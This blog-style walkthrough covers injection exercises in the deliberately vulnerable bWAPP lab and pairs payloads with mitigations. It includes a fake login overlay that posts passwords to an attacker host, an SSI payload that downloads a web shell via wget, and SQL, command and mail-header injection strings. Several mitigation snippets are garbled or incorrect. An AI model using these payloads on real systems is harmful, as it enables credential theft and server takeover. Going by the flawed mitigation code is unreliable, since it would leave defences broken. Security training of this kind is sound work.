OWASP Top 10: Bwapp Walkthrough For A1-Injections

1) HTML Injection - Reflected (GET/POST):

Payload: <script>alert(document.cookie)</script>


Mitigation:
GET and POST are the methods of HTML used for the requesting data from sever, Mitigation for these methods can be added as blocking of special characters like < > / etc also
  • Using of html=html.replace(/</g, “&lt;”).replace(/>/g, “gt;”); in javasrcipt
  • Using of jQuery functions like
             function (html) {
             return $($.parseHTML(html)).text();
             }
  • If a string contains a potential html code than developer can use
            $msg = “<div></div>”;
            $safe_msg = htmlspecialchars($msg, ENT_QUOTES);
            echo $safe_msg;
  • DOM Objects are sanitized in user input fields.              

2) HTML Injection - Reflected (URL):

Payload: changing the host address can act as payload.

Mitigation:
For this type of attack server side functionalities are improved such way that request form a changed host address will rejected.

3) HTML Injection - Stored (Blog):
Payload:
<div class="code"><iframe SRC="http://attackerIP/blah" height="0" width="0"></iframe></div>
<div class="code">test</div>
<div style="position: absolute; left: 0px; top: 0px; width: 800px; height: 600px; z-index: 1000;
background-color:white;">
Session Expired, Please Login:<br>
<form name="login" action="http://attackerIP/lol.htm">
<table>
<tr><td>Username:</td><td><input type="text" name="uname"/></td></tr>
<tr><td>Password:</td><td><input type="password" name="pw"/></td></tr>
</table>
<input type="submit" value="Login"/>
</form>
</div>


Mitigation:
  • Mitigation for this type of attacks is done blocking the characters in user input like < > / <script> etc.
  • DOM objects parameters are sanitized from the user input data

4) IFrame Injection:

Payload: morphed queries in the url parameters will make the iframe injection.



Mitigation:
  • Effective way of preventing iframe injection is to set all your files to read only
  • Developers must have a habit of developing offline and then uploading the files and set the permission to 444 (read only) if you must make changes live change the permissions on the page you are working on so you can write to the file and then change permission back to read-only when you have completed editing the file
  • Using Web application-level firewalls(WAF)

5) Mail Header Injection:

Payload:nilesh83@gmail.com%0aBcc:allotherpeople@thecompany.com


Mitigation:
  • Never trust user input fields. All user inputs should be considered untrusted and potentially malicious. Applications that process untrusted input may become vulnerable to attacks such as Buffer Overflows, SQL Injection, OS Commanding, Denial of Service and Email Injection.
  • Use regular expressions to filter user data. For example, we can search for (\r or \n) in the input string.
  • Use external components and libraries that provide protection against this problem like ZEND mail, PEAR mail and swift mailer.
  • ModSecurity can put a stop to email injection on the server level. With ModSecurity, it is possible to scan the POST or GET body for BCC, CC, or To and reject any request that contains those letters.

6) OS Command Injection:

Payloads: ping localhost && ls; or combination of commands with the user input.


Mitigation:
For patching the Command Injection attack a strict validation mechanism must be built and its functionalities are implemented, the user input data is validated with the database containing the attack patterns www.nsa.gov; ls; such that it only allow alpha numeric characters. In the above command injection attack includes the special characters & or ; which will separates the commands and data while executing at the service end, so one must develop the functionalities concerning these all facts.

7) PHP Code Injection:

Payload: phpinfo() include(), include_once(), require() and require_once(), htmlspecialchars(), htmlentities(), strip_tags() functions.


Mitigation: For mitigating this type of attack one must block
  • htmlspecialchars() turns &, ', ", <, and > into an HTML entity format (&, ", etc.)
  • htmlentities() turns all applicable characters into their HTML entity format.
  • strip_tags() removes all HTML and PHP tags.

8) Server-Side Includes (SSI) Injection:

Payload: <!--#exec cmd="ls" --> , <!--#exec cmd="cd /root/dir/"> , <!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --> ,<!--#config errmsg="File not found, informs users and password"-->





Mitigation:
  • Disable SSI execution on pages that do not require it. For pages requiring SSI ensure that you perform the following checks
  • Only enable the SSI directives that are needed for this page and disable all others.
  • HTML entity encodes user supplied data before passing it to a page with SSI execution permissions.
  • Use SUExec to have the page execute as the owner of the file instead of the web server user.

9) SQL Injection (GET/Search):

Payload: iron man' or 1=1 #, payload requires building a command on the basis of the database error message.


10) SQL Injection (GET/Select):

Payload: union select or select from can be combined with the user input data



11) SQL Injection (POST/Search):


Payload: iron man’ or 1=1 #


12) SQL Injection (POST/Select):

Payload: union select 2,3,4,5#



13) SQL Injection (Login Form/Hero):

Payload: ‘ OR 1=1#


14) SQL Injection (Login Form/User):

Payload: bee’ OR 1=1#



15) SQL Injection (SQLite):

Payload: ’OR 1=1;


16) SQL Injection - Stored (Blog):

Payload: test’,’anonymous’)#

17) SQL Injection - Stored (SQLite):

Payload: ‘,’’);

18) SQL Injection - Stored (User-Agent):

Payload: Prakash‘,’0.0.0.0’)#




19) SQL Injection - Blind - Boolean-Based:

The attack will be replied back with true or false statement
Payload: test’ or 1=1#

20) SQL Injection - Blind - Time-Based:

Payload: Payloads for this type of attack are mainly time based sql statements sleep(30) etc

21) SQL Injection - Blind (SQLite):

Payload: ‘OR 1=1;

22) XML/X-Path Injection (Login Form):

Payload: whatever’ or 1=1 or’



Mitigations for all SQL Injection attacks

Mitigations for all these type of attacks can be developed in two ways
  • White listing: While list allows only certain characters to pass through it, adding characters such as admin to this list makes the application to receive only the listed characters.
  • Sanitization: Which involves the Sanitizing the user input by removing the unwanted characters such as  ’ OR ‘1=1’ ‘— will be sanitized such that only admin is passed through it.
  • Black listing: Black listing can be used but not an effective way if are really considering all type of injections. Black list with a database of patterns with regularly updating may help.
  • Using of stored procedures like
       Query=“ exec inserUsername @value1=” & request.querystring(“value1”)
  • Avoid using of dynamic SQL in stored procedures.
  • Use prepared statements with parameterized Queries like,
       Public Boolean authenticate (String name, String  pass) {
          PreparedStatement  pstmt;
          String sql = “ SELECT name FROM user WHERE name=? AND passwd=?”;
          pstmt.setString (0, name);
          pstmt.setString (1, pass);
          ResultSet results = pstmt.executeQuery();
          Return results.first();
          }
Labels: ,
Subscribe to: Posts (Atom)